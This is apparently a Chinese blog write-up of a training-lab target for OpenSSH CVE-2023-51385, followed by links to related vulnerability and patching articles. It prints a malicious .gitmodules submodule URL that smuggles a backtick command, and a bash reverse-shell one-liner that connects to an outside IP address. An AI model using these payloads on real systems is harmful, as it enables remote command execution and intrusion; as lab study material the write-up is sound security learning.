春秋云镜(OpenSSH)·CVE-2023-51385

已于 2024-08-30 15:48:19 修改
阅读量272 收藏 2
点赞数 2
文章标签: 安全 web安全
于 2024-08-30 15:29:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61155226/article/details/141719165
版权

靶标介绍:

        OpenSSH 是使用 SSH 协议进行远程登录的连接工具。在OpenSSH 9.6版本之前的ssh中,如果用户名或主机名中含有shell元字符(如 | ' "等),并且ssh_config中ProxyCommand、LocalCommand指令或"match exec"谓词通过%u、%h或类似的扩展标记引用用户或主机名时,可能会发生命令注入。Git未禁止用户或主机名中的shell元字符,存储库可能包含一个带有shell元字符的子模块用户或主机名,可能导致产生命令注入漏洞。

  参考资料:mp.weixin.qq.com/s/6LwOlPSVQgwqkSFZ2iys7g

   我们访问靶场如下图所示:

我们先使用Gitee从GitHub导入仓库:

然后访问该仓库,创建一个shell.sh文件,并修改.gitmodules文件的内容如下,然后保存:

[submodule "cve"]
	path = cve
	url = ssh://`bash shell.sh`foo.ichunqiu.com/bar
bash -c 'exec bash -i &>/dev/tcp/159.75.114.131/8889 <&1'

然后VPS开启监听:

在靶机中,填入你的仓库地址,然后点击一键部署,即可获取到反弹Shell:

SlackMoon
关注
【漏洞复现】OpenSSH ProxyCommand命令注入漏洞(CVE-2023-51385
做自己喜欢的事,并将其发挥到极致!
12-27 5238
OpenSSH 是 SSH(Secure SHell)协议的免费开源实现。SSH协议族可以用来进行远程控制, 或在计算机之间传送文件。而实现此功能的传统方式,如telnet(终端仿真协议)、 rcp ftp、 rlogin、rsh都是极为不安全的,并且会使用明文传送密码。OpenSSH提供了服务端后台程序和客户端工具,用来加密远程控制和文件传输过程中的数据,并由此来代替原来的类似服务。一个存在于OpenSSH中的命令注入漏洞,攻击者可利用该漏洞注入恶意Shell字符导致命令注入。
Cockpit upload文件上传漏洞(CVE-2023-1313)
0xSec
12-16 1960
Cockpitassetsmanager/upload接口处存在文件上传漏洞,攻击者可通过该漏洞在服务器端任意上传代码,写入后门,获取服务器权限,进而控制整个web服务器。
OpenSSH漏洞CVE-2023-51385可能允许远程执
极道Jdon的技术博客
12-26 1926
被跟踪为CVE-2023-51385的漏洞源于在 OpenSSH 中使用 ProxyCommand 或 ProxyJump 功能时在某些情况下对用户提供的输入验证不足。如果成功利用,该缺陷可能会被用来绕过身份验证并获得对运行易受攻击的 OpenSSH 版本的系统的未经授权的远程访问。,所有受影响的用户应紧急更新到最新的 OpenSSH 版本 9.6p1,其中包含此缺陷的修复程序。用户还应该谨慎对待来自不受信任来源的主机名。这表明该漏洞是真实存在的,远程攻击者在适当的情况下是可以利用的。
OpenSSH 安全漏洞(CVE-2023-51385) 升级v9.7
qq_44534541的博客
04-09 1616
漏洞编号:OpenSSH 安全漏洞(CVE-2023-51385)
OpenSSH 安全漏洞(CVE-2023-51385)修复、openss9.7p1
qq_55854984的博客
04-26 547
OpenSSH 安全漏洞(CVE-2023-51385OpenSSH(OpenBSD Secure Shell)是加拿大OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 9.6之前版本存在安全漏洞,该漏洞源于存在操作系统命令注入漏洞。
CVE-2023-51385 OpenSSH ProxyCommand命令注入漏洞
mirocky的博客
01-09 3249
ssh_config文件中的ProxyCommand、LocalCommand指令或"match exec"谓词通过%u、%h或类似的扩展标记引用用户或主机名时,可能会导致命令注入的风险。在Git中,用户或主机名中的shell元字符未被禁止(如在主机名中进行命令拼接),这可能导致存储库包含一个带有shell元字符的子模块用户或主机名。这种情况可能引发命令注入漏洞。
CentOS 7 升级OpenSSH 9.6p1解决OpenSSH 安全漏洞CVE-2023-51385
ZHUMUYI0的博客
06-04 1919
CentOS7 OpenSSH安全加固
CentOS 7 升级OpenSSH 9.6p1解决安全漏洞CVE-2023-51384、CVE-2023-51385
weixin_45371131的博客
02-27 1541
openssh9.6P1,
OpenSSH 安全漏洞(CVE-2023-51385) 升级v9,不可思议
04-18 1017
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
2023年,OpenSSH发现了一个名为CVE-2023-38408的安全漏洞,这个漏洞可能允许攻击者在特定条件下绕过身份验证或执行未授权的操作,对系统安全构成威胁。为了保护您的系统不受此漏洞影响,及时升级到OpenSSH 9.5p1...
统信UOS1050e -openssh 9.6p1升级包
03-07
统信UOS1050e -------openssh 9.6p1升级包,修复OpenSSH 安全漏洞(CVE-2023-51385)
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
tar xzf openssh-8.4p1.tar.gz cd openssh-8.4p1 ./configure make sudo make install ``` 4. 更新sshd配置文件(通常位于/etc/ssh/sshd_config),根据需求进行必要的调整,并确保安全性设置正确。 5. 重启...
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
OpenSSH 资源管理错误漏洞(CVE-2021-28041) OpenSSH 是一个开源的 SSH 服务器实现,广泛应用于 Linux、Unix 和 Windows 等操作系统中。然而,OpenSSH 也存在一些安全漏洞,其中之一就是资源管理错误漏洞(CVE-2021-...
春秋云镜 CVE-2023-1313
qq274575499的博客
04-03 1167
cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装。
OpenSSH ProxyCommand命令注入漏洞(CVE-2023-51385)附验证方法
Elliot1314的博客
01-29 802
OpenSSH提供了服务端后台程序和客户端工具,用来加密远程控制和文件传输过程中的数据,并由此来代替原来的类似服务。近日,新华三盾山实验室监测到OpenSSH官方发布了安全公告,修复了一个存在于OpenSSH中的命令注入漏洞(CVE-2023-51385),攻击者可利用该漏洞注入恶意Shell字符导致命令注入。此漏洞是由于OpenSSH中的ProxyCommand命令未对%h、%p或类似的扩展标记进行正确的过滤,攻击者可通过这些值注入恶意shell字符进行命令注入攻击。配置完成后,执行下面的指令触发。
Goby 漏洞发布|Cockpit 平台 upload 文件上传漏洞(CVE-2023-1313)
m0_46699477的博客
09-28 904
Cockpit 是一个自托管、灵活且用户友好的无头内容平台,用于创建自定义数字体验。Cockpit 存在文件上传漏洞,攻击者可上传任意文件,进而导致服务器被控制等。
春秋云境CVE-2023-1313
2303_76653367的博客
05-10 346
cockpit在2.4.1版本之前存在任意文件上传漏洞PS:通过在浏览器中打开/install来运行安装。5.获取文件地址,右键download在新窗口中打开链接,得到文件存放地址。2.访问install,得到账号密码:admin\admin。发现需要账号密码,按题目要求访问install。3.进入主页,发现上传页面,上传一句话木马。比较简单的一道文件上传题。
SSH版本升级-openssh-9.8p1
最新发布
君临天下的博客
06-30 2800
漏洞描述OpenSSH(OpenBSD Secure Shell)是加拿大OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH 9.6之前版本存在安全漏洞,该漏洞源于存在操作系统命令注入漏洞。
OpenSSH 安全漏洞(CVE-2023-51767)
06-13
CVE-2023-51767是针对OpenSSH (Open Source Secure Shell)的一个已公开的安全漏洞。OpenSSH是一个广泛使用的远程登录工具,允许用户通过网络安全地进行命令交互和文件传输。这个漏洞被标记为严重级别,因为它涉及到SSH协议的认证部分,可能被恶意攻击者利用来进行未经授权的访问。 具体来说,CVE-2023-51767涉及OpenSSH服务器中处理键盘交互式请求的代码。攻击者可能会构造特殊的键盘交互请求,诱使用户输入敏感信息,从而绕过正常的认证流程或获取用户的凭据。由于该漏洞影响了SSH的核心功能,因此它可能在未打补丁的服务器上造成广泛的影响。 为了保护系统免受此漏洞的侵害,建议所有使用OpenSSH的组织尽快更新到最新版本,修复该漏洞。官方会提供相应的安全公告和补丁下载,确保服务器的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值